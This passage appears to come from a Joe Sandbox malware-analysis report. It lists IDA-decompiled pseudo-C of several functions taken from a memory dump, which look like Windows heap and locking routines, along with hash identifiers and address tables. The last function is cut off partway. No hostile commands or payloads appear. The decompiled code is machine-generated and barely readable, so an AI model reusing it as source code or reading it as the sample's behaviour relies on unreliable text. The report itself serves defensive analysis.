                                                                                                            • Instruction Fuzzy Hash: 07316D75A14249EFDB44CF58D841B9AFBE4FB09314F1482AAF948CB341E631ED90CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0109BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				intOrPtr _t22;
                                                                                                            				intOrPtr* _t41;
                                                                                                            				intOrPtr _t51;
                                                                                                            
                                                                                                            				_t51 =  *0x1156100; // 0x5
                                                                                                            				_v12 = __edx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				if(_t51 >= 0x800) {
                                                                                                            					L12:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					goto L1;
                                                                                                            				}
                                                                                                            				while(1) {
                                                                                                            					L1:
                                                                                                            					_t22 = _t51;
                                                                                                            					asm("lock cmpxchg [ecx], edx");
                                                                                                            					if(_t51 == _t22) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t51 = _t22;
                                                                                                            					if(_t22 < 0x800) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            				E01082280(0xd, 0x56af1a0);
                                                                                                            				_t41 =  *0x11560f8; // 0x0
                                                                                                            				if(_t41 != 0) {
                                                                                                            					 *0x11560f8 =  *_t41;
                                                                                                            					 *0x11560fc =  *0x11560fc + 0xffff;
                                                                                                            				}
                                                                                                            				E0107FFB0(_t41, 0x800, 0x56af1a0);
                                                                                                            				if(_t41 != 0) {
                                                                                                            					L6:
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                                            					do {
                                                                                                            						asm("lock xadd [0x11560f0], ax");
                                                                                                            						 *((short*)(_t41 + 0x34)) = 1;
                                                                                                            					} while (1 == 0);
                                                                                                            					goto L8;
                                                                                                            				} else {
                                                                                                            					_t41 = L01084620(0x1156100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                                            					if(_t41 == 0) {
                                                                                                            						L11:
                                                                                                            						asm("lock dec dword [0x1156100]");
                                                                                                            						L8:
                                                                                                            						return _t41;
                                                                                                            					}
                                                                                                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                                            					if(_t41 == 0) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1fdd3c3afa6cdea2a097d740131f41cb0bb33442e035d9103393430d1c74ab29
                                                                                                            • Instruction ID: a29bb7b1d51c2779dd45af556e0ce524b9fc832ade27289b4a6c16cf659fd573
                                                                                                            • Opcode Fuzzy Hash: 1fdd3c3afa6cdea2a097d740131f41cb0bb33442e035d9103393430d1c74ab29
                                                                                                            • Instruction Fuzzy Hash: BF31FF72A01656DBCB61EF58E490BAA73B4FF18320F4440B8EDA4DB205EB74D985DBC1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 76%
                                                                                                            			E01069100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t56;
                                                                                                            				signed int* _t60;
                                                                                                            				signed int _t63;
                                                                                                            				signed int _t66;
                                                                                                            				signed int _t69;
                                                                                                            				void* _t70;
                                                                                                            				intOrPtr* _t72;
                                                                                                            				void* _t78;
                                                                                                            				void* _t79;
                                                                                                            				signed int _t80;
                                                                                                            				intOrPtr _t82;
                                                                                                            				void* _t85;
                                                                                                            				void* _t88;
                                                                                                            				void* _t89;
                                                                                                            
                                                                                                            				_t84 = __esi;
                                                                                                            				_t70 = __ecx;
                                                                                                            				_t68 = __ebx;
                                                                                                            				_push(0x2c);
                                                                                                            				_push(0x113f6e8);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                            				if(_t82 == 0) {
                                                                                                            					L4:
                                                                                                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                                            						E011388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					return E010BD130(_t68, _t82, _t84);
                                                                                                            				}
                                                                                                            				_t88 = _t82 -  *0x11586c0; // 0xc007b0
                                                                                                            				if(_t88 == 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t89 = _t82 -  *0x11586b8; // 0x0
                                                                                                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                            					goto L4;
                                                                                                            				} else {
                                                                                                            					E01082280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                            					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                                            					if(__eflags != 0) {
                                                                                                            						E011388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                                            						goto L12;
                                                                                                            					} else {
                                                                                                            						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                                            							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                                            							_push(_t82);
                                                                                                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                                            							E010AAFD0();
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							_t60 = _t82 + 8;
                                                                                                            							 *(_t85 - 0x2c) = _t60;
                                                                                                            							_t68 =  *_t60;
                                                                                                            							_t80 = _t60[1];
                                                                                                            							 *(_t85 - 0x28) = _t68;
                                                                                                            							 *(_t85 - 0x24) = _t80;
                                                                                                            							while(1) {
                                                                                                            								L10:
                                                                                                            								__eflags = _t80;
                                                                                                            								if(_t80 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t84 = _t68;
                                                                                                            								 *(_t85 - 0x30) = _t80;
                                                                                                            								 *(_t85 - 0x24) = _t80 - 1;
                                                                                                            								asm("lock cmpxchg8b [edi]");
                                                                                                            								_t68 = _t84;
                                                                                                            								 *(_t85 - 0x28) = _t68;
                                                                                                            								 *(_t85 - 0x24) = _t80;
                                                                                                            								__eflags = _t68 - _t84;
                                                                                                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                            								if(_t68 != _t84) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                                            								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								__eflags = _t80;
                                                                                                            								if(_t80 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t63 = 0;
                                                                                                            								 *(_t85 - 0x34) = 0;
                                                                                                            								_t84 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								while(1) {
                                                                                                            									 *(_t85 - 0x3c) = _t84;
                                                                                                            									__eflags = _t84 - 3;
                                                                                                            									if(_t84 >= 3) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									__eflags = _t63;
                                                                                                            									if(_t63 != 0) {
                                                                                                            										L40:
                                                                                                            										_t84 =  *_t63;
                                                                                                            										__eflags = _t84;
                                                                                                            										if(_t84 != 0) {
                                                                                                            											_t84 =  *(_t84 + 4);
                                                                                                            											__eflags = _t84;
                                                                                                            											if(_t84 != 0) {
                                                                                                            												 *0x115b1e0(_t63, _t82);
                                                                                                            												 *_t84();
                                                                                                            											}
                                                                                                            										}
                                                                                                            										do {
                                                                                                            											_t60 = _t82 + 8;
                                                                                                            											 *(_t85 - 0x2c) = _t60;
                                                                                                            											_t68 =  *_t60;
                                                                                                            											_t80 = _t60[1];
                                                                                                            											 *(_t85 - 0x28) = _t68;
                                                                                                            											 *(_t85 - 0x24) = _t80;
                                                                                                            											goto L10;
                                                                                                            										} while (_t63 == 0);
                                                                                                            										goto L40;
                                                                                                            									}
                                                                                                            									_t69 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            									while(1) {
                                                                                                            										 *(_t85 - 0x38) = _t69;
                                                                                                            										__eflags = _t69 -  *0x11584c0;
                                                                                                            										if(_t69 >=  *0x11584c0) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										__eflags = _t63;
                                                                                                            										if(_t63 != 0) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t66 = E01139063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                                            										__eflags = _t66;
                                                                                                            										if(_t66 == 0) {
                                                                                                            											_t63 = 0;
                                                                                                            											__eflags = 0;
                                                                                                            										} else {
                                                                                                            											_t63 = _t66 + 0xfffffff4;
                                                                                                            										}
                                                                                                            										 *(_t85 - 0x34) = _t63;
                                                                                                            										_t69 = _t69 + 1;
                                                                                                            									}
                                                                                                            									_t84 = _t84 + 1;
                                                                                                            								}
                                                                                                            								__eflags = _t63;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                                            							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                                            							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                                            							L12:
                                                                                                            							 *(_t85 - 4) = 0xfffffffe;
                                                                                                            							E0106922A(_t82);
                                                                                                            							_t53 = E01087D50();
                                                                                                            							__eflags = _t53;
                                                                                                            							if(_t53 != 0) {
                                                                                                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            							} else {
                                                                                                            								_t56 = 0x7ffe0386;
                                                                                                            							}
                                                                                                            							__eflags =  *_t56;
                                                                                                            							if( *_t56 != 0) {
                                                                                                            								_t56 = E01138B58(_t82);
                                                                                                            							}
                                                                                                            							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                                            								__eflags = _t82 -  *0x11586c0; // 0xc007b0
                                                                                                            								if(__eflags != 0) {
                                                                                                            									__eflags = _t82 -  *0x11586b8; // 0x0
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t79 = 0x11586bc;
                                                                                                            										_t72 = 0x11586b8;
                                                                                                            										goto L18;
                                                                                                            									}
                                                                                                            									__eflags = _t56 | 0xffffffff;
                                                                                                            									asm("lock xadd [edi], eax");
                                                                                                            									if(__eflags == 0) {
                                                                                                            										E01069240(_t68, _t82, _t82, _t84, __eflags);
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t79 = 0x11586c4;
                                                                                                            									_t72 = 0x11586c0;
                                                                                                            									L18:
                                                                                                            									E01099B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


















                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x0106919a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c371f
                                                                                                            0x010c3721
                                                                                                            0x010c3727
                                                                                                            0x010c372f
                                                                                                            0x010c3733
                                                                                                            0x010c3735
                                                                                                            0x010c3738
                                                                                                            0x010c373b
                                                                                                            0x010c373d
                                                                                                            0x010c3740
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3746
                                                                                                            0x010c3749
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c374f
                                                                                                            0x010c3751
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3757
                                                                                                            0x010c3759
                                                                                                            0x010c375c
                                                                                                            0x010c375c
                                                                                                            0x010c375e
                                                                                                            0x010c375e
                                                                                                            0x010c3761
                                                                                                            0x010c3764
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3766
                                                                                                            0x010c3768
                                                                                                            0x010c37a3
                                                                                                            0x010c37a3
                                                                                                            0x010c37a5
                                                                                                            0x010c37a7
                                                                                                            0x010c37ad
                                                                                                            0x010c37b0
                                                                                                            0x010c37b2
                                                                                                            0x010c37bc
                                                                                                            0x010c37c2
                                                                                                            0x010c37c2
                                                                                                            0x010c37b2
                                                                                                            0x01069187
                                                                                                            0x01069187
                                                                                                            0x0106918a
                                                                                                            0x0106918d
                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x01069187
                                                                                                            0x010c376a
                                                                                                            0x010c376a
                                                                                                            0x010c376c
                                                                                                            0x010c376c
                                                                                                            0x010c376f
                                                                                                            0x010c3775
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3777
                                                                                                            0x010c3779
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3782
                                                                                                            0x010c3787
                                                                                                            0x010c3789
                                                                                                            0x010c3790
                                                                                                            0x010c3790
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c3792
                                                                                                            0x010c3795
                                                                                                            0x010c3795
                                                                                                            0x010c3798
                                                                                                            0x010c3798
                                                                                                            0x010c379b
                                                                                                            0x010c379b
                                                                                                            0x010691a3
                                                                                                            0x010691a9
                                                                                                            0x010691b0
                                                                                                            0x010691b4
                                                                                                            0x010691b4
                                                                                                            0x010691bb
                                                                                                            0x010691c0
                                                                                                            0x010691c5
                                                                                                            0x010691c7
                                                                                                            0x010c37da
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691d2
                                                                                                            0x010691d5
                                                                                                            0x01069239
                                                                                                            0x01069239
                                                                                                            0x010691d7
                                                                                                            0x010691db
                                                                                                            0x010691e1
                                                                                                            0x010691e7
                                                                                                            0x010691fd
                                                                                                            0x01069203
                                                                                                            0x0106921e
                                                                                                            0x01069223
                                                                                                            0x00000000
                                                                                                            0x01069223
                                                                                                            0x01069205
                                                                                                            0x01069208
                                                                                                            0x0106920c
                                                                                                            0x01069214
                                                                                                            0x01069214
                                                                                                            0x010691e9
                                                                                                            0x010691e9
                                                                                                            0x010691ee
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691e7
                                                                                                            0x00000000
                                                                                                            0x010691db
                                                                                                            0x01069187
                                                                                                            0x01069168

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7dcece3a40b495675ec65b976273d523588c6cf40066864b414cabc1802e54d2
                                                                                                            • Instruction ID: 08f1dc9805e96532baf7e73d86e27d0a0cc47f70ba4387aa65fdc7d6e27e08e0
                                                                                                            • Opcode Fuzzy Hash: 7dcece3a40b495675ec65b976273d523588c6cf40066864b414cabc1802e54d2
                                                                                                            • Instruction Fuzzy Hash: A331F871A01246DFDB65DF6CC1887ECBBF5BF88318F24819DC5946B641C334A980CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 60%
                                                                                                            			E01091DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                            				char _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr* _v20;
                                                                                                            				void* _t22;
                                                                                                            				char _t23;
                                                                                                            				void* _t36;
                                                                                                            				intOrPtr _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            
                                                                                                            				_v12 = __ecx;
                                                                                                            				_t43 = 0;
                                                                                                            				_v20 = __edx;
                                                                                                            				_t42 =  *__edx;
                                                                                                            				 *__edx = 0;
                                                                                                            				_v16 = _t42;
                                                                                                            				_push( &_v8);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push(6);
                                                                                                            				_push(0);
                                                                                                            				_push(__ecx);
                                                                                                            				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                                                            				_push(_t36);
                                                                                                            				_t22 = E0108F460();
                                                                                                            				if(_t22 < 0) {
                                                                                                            					if(_t22 == 0xc0000023) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					L3:
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_t23 = _v8;
                                                                                                            				if(_t23 != 0) {
                                                                                                            					_t38 = _a4;
                                                                                                            					if(_t23 >  *_a4) {
                                                                                                            						_t42 = L01084620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                                                            						if(_t42 == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            						_t23 = _v8;
                                                                                                            					}
                                                                                                            					_push( &_v8);
                                                                                                            					_push(_t23);
                                                                                                            					_push(_t42);
                                                                                                            					_push(6);
                                                                                                            					_push(_t43);
                                                                                                            					_push(_v12);
                                                                                                            					_push(_t36);
                                                                                                            					if(E0108F460() < 0) {
                                                                                                            						if(_t42 != 0 && _t42 != _v16) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                                                            						}
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					 *_v20 = _t42;
                                                                                                            					 *_a4 = _v8;
                                                                                                            				}
                                                                                                            				_t43 = 1;
                                                                                                            				goto L3;
                                                                                                            			}












                                                                                                            0x01091e09
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction ID: a0f22c18344462a23146c03ccb9d05b1e6a9d406d6b66710ef3b746383f2f3bc
                                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction Fuzzy Hash: 81219F3270421AFBDB21DF59CC90EAABBBDEF89750F114095EA8197210D674AE01D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E01080050(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				intOrPtr* _t31;
                                                                                                            				signed int _t34;
                                                                                                            				void* _t40;
                                                                                                            				void* _t41;
                                                                                                            				signed int _t44;
                                                                                                            				intOrPtr _t47;
                                                                                                            				signed int _t58;
                                                                                                            				void* _t59;
                                                                                                            				void* _t61;
                                                                                                            				void* _t62;
                                                                                                            				signed int _t64;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_v8 =  *0x115d360 ^ _t64;
                                                                                                            				_t61 = __ecx;
                                                                                                            				_t2 = _t61 + 0x20; // 0x20
                                                                                                            				E01099ED0(_t2, 1, 0);
                                                                                                            				_t52 =  *(_t61 + 0x8c);
                                                                                                            				_t4 = _t61 + 0x8c; // 0x8c
                                                                                                            				_t40 = _t4;
                                                                                                            				do {
                                                                                                            					_t44 = _t52;
                                                                                                            					_t58 = _t52 & 0x00000001;
                                                                                                            					_t24 = _t44;
                                                                                                            					asm("lock cmpxchg [ebx], edx");
                                                                                                            					_t52 = _t44;
                                                                                                            				} while (_t52 != _t44);
                                                                                                            				if(_t58 == 0) {
                                                                                                            					L7:
                                                                                                            					_pop(_t59);
                                                                                                            					_pop(_t62);
                                                                                                            					_pop(_t41);
                                                                                                            					return E010AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                                            				}
                                                                                                            				asm("lock xadd [esi], eax");
                                                                                                            				_t47 =  *[fs:0x18];
                                                                                                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                            				if(_t30 != 0) {
                                                                                                            					if( *_t30 == 0) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            					L5:
                                                                                                            					if( *_t31 != 0) {
                                                                                                            						_t18 = _t61 + 0x78; // 0x78
                                                                                                            						E01138A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                                            					}
                                                                                                            					_t52 =  *(_t61 + 0x5c);
                                                                                                            					_t11 = _t61 + 0x78; // 0x78
                                                                                                            					_t34 = E01099702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                                            					_t24 = _t34 | 0xffffffff;
                                                                                                            					asm("lock xadd [esi], eax");
                                                                                                            					if((_t34 | 0xffffffff) == 0) {
                                                                                                            						 *0x115b1e0(_t61);
                                                                                                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                                            					}
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				L4:
                                                                                                            				_t31 = 0x7ffe0386;
                                                                                                            				goto L5;
                                                                                                            			}





















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e93227b3a0291c7775414f17131f9bf8fd5d2e5cb2e1eb9f6901d165234a8d35
                                                                                                            • Instruction ID: 011d7b16eed1152ccc083d2725328e79e3bef31efe2587de6baabcd573d7b40e
                                                                                                            • Opcode Fuzzy Hash: e93227b3a0291c7775414f17131f9bf8fd5d2e5cb2e1eb9f6901d165234a8d35
                                                                                                            • Instruction Fuzzy Hash: 7031AE31201B04CFDB66DB28C940B9AB7E5FF88714F1445ADF5DA87694DB35A806CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 77%
                                                                                                            			E010E6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                                                            				signed short* _v8;
                                                                                                            				signed char _v12;
                                                                                                            				void* _t22;
                                                                                                            				signed char* _t23;
                                                                                                            				intOrPtr _t24;
                                                                                                            				signed short* _t44;
                                                                                                            				void* _t47;
                                                                                                            				signed char* _t56;
                                                                                                            				signed char* _t58;
                                                                                                            
                                                                                                            				_t48 = __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t44 = __ecx;
                                                                                                            				_v12 = __edx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				_t22 = E01087D50();
                                                                                                            				_t58 = 0x7ffe0384;
                                                                                                            				if(_t22 == 0) {
                                                                                                            					_t23 = 0x7ffe0384;
                                                                                                            				} else {
                                                                                                            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            				}
                                                                                                            				if( *_t23 != 0) {
                                                                                                            					_t24 =  *0x1157b9c; // 0x0
                                                                                                            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                                                            					_t23 = L01084620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                                                            					_t56 = _t23;
                                                                                                            					if(_t56 != 0) {
                                                                                                            						_t56[0x24] = _a4;
                                                                                                            						_t56[0x28] = _a8;
                                                                                                            						_t56[6] = 0x1420;
                                                                                                            						_t56[0x20] = _v12;
                                                                                                            						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                                                            						E010AF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            						}
                                                                                                            						_push(_t56);
                                                                                                            						_push(_t47 - 0x20);
                                                                                                            						_push(0x402);
                                                                                                            						_push( *_t58 & 0x000000ff);
                                                                                                            						E010A9AE0();
                                                                                                            						_t23 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t23;
                                                                                                            			}













                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d469ffa320847b5260a5dcec6c1e86496d82b50d6587805e5ce18cf2a2f50fd
                                                                                                            • Instruction ID: af6ed00f63dede2c8b7f9a1c9e1c2ba03c50982c44a75a5dcac8220b88633677
                                                                                                            • Opcode Fuzzy Hash: 7d469ffa320847b5260a5dcec6c1e86496d82b50d6587805e5ce18cf2a2f50fd
                                                                                                            • Instruction Fuzzy Hash: D021CA72A00649AFD711EF69D884E6AB7F8FF18300F1440A9F988C7790D635E950CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                            				intOrPtr* _v0;
                                                                                                            				void* _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				char _v36;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr _t41;
                                                                                                            				void* _t44;
                                                                                                            				signed int _t45;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				signed int _t57;
                                                                                                            				signed int _t58;
                                                                                                            				intOrPtr* _t59;
                                                                                                            				void* _t62;
                                                                                                            				void* _t63;
                                                                                                            				void* _t65;
                                                                                                            				void* _t66;
                                                                                                            				signed int _t69;
                                                                                                            				intOrPtr* _t70;
                                                                                                            				void* _t71;
                                                                                                            				intOrPtr* _t72;
                                                                                                            				intOrPtr* _t73;
                                                                                                            				char _t74;
                                                                                                            
                                                                                                            				_t65 = __edx;
                                                                                                            				_t57 = _a4;
                                                                                                            				_t32 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t3 = _t32 + 0x14c; // 0x14c
                                                                                                            				_t70 = _t3;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_t72 =  *_t70;
                                                                                                            				while(_t72 != _t70) {
                                                                                                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                                            						L24:
                                                                                                            						_t72 =  *_t72;
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					_t30 = _t72 + 0x10; // 0x10
                                                                                                            					if(E010BD4F0(_t30, _t65, _t57) == _t57) {
                                                                                                            						return 0xb7;
                                                                                                            					}
                                                                                                            					_t65 = _v8;
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            				_t61 = _t57;
                                                                                                            				_push( &_v12);
                                                                                                            				_t66 = 0x10;
                                                                                                            				if(E0109E5E0(_t57, _t66) < 0) {
                                                                                                            					return 0x216;
                                                                                                            				}
                                                                                                            				_t73 = L01084620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                                            				if(_t73 == 0) {
                                                                                                            					_t38 = 0xe;
                                                                                                            					return _t38;
